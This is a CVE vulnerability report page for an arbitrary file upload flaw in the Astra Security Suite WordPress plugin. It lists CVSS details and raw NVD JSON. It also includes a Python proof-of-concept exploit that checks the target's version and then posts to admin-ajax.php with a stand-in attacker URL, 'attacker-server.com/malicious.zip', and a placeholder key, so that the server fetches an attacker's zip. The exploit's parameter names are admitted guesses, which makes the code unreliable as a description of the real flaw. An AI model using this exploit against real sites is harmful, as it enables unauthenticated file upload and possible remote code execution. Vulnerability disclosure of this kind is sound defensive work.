Security Vulnerability Report
CVE-2025-11521 CVSS 8.1 HIGH

CVE-2025-11521

Published: 2025-11-11 04:15:42
Last Modified: 2026-04-15 00:35:42

Description

The Astra Security Suite – Firewall & Malware Scan plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient validation of remote URLs for zip downloads and an easily guessable key in all versions up to, and including, 0.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Astra Security Suite WordPress Plugin <= 0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-11521 PoC - Astra Security Suite WordPress Plugin Arbitrary File Upload
Note: This PoC is for educational and authorized testing purposes only.
"""
import requests
import json
import sys

TARGET_URL = "http://target-wordpress-site.com"
PLUGIN_PATH = "/wp-content/plugins/getastra"
MALICIOUS_ZIP_URL = "http://attacker-server.com/malicious.zip"


def check_version(target_url):
    """Check if target is running vulnerable version"""
    response = requests.get(f"{target_url}{PLUGIN_PATH}/README.md", timeout=10)
    return "0.2" in response.text if response.status_code == 200 else None


def exploit_zip_upload(target_url, malicious_zip_url):
    """
    Exploit the arbitrary file upload vulnerability by sending a crafted
    request with a malicious ZIP URL
    """
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    # The vulnerable parameter names may vary
    payload = {
        "action": "astra_download_backup",
        "url": malicious_zip_url,
        "key": "guessable_key_here",  # Easily guessable key
    }
    try:
        response = requests.post(endpoint, data=payload, timeout=30)
        if response.status_code == 200:
            result = response.json()
            print(f"[+] Response: {json.dumps(result, indent=2)}")
            return True
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
    return False


def main():
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2025-11521-poc.py <target_url>")
        sys.exit(1)
    target = sys.argv[1]
    print(f"[*] Testing target: {target}")
    if check_version(target):
        print("[+] Target appears to be vulnerable (version <= 0.2)")
        print("[*] Attempting exploitation...")
        exploit_zip_upload(target, MALICIOUS_ZIP_URL)
    else:
        print("[-] Target may not be vulnerable or is not reachable")


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11521", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:41.797", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Astra Security Suite – Firewall & Malware Scan plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient validation of remote URLs for zip downloads and an easily guessable key in all versions up to, and including, 0.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://wordpress.org/plugins/getastra/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f99a6b5c-e95d-49d0-a4b2-1d7188447da1?source=cve", "source": "[email protected]"}]}}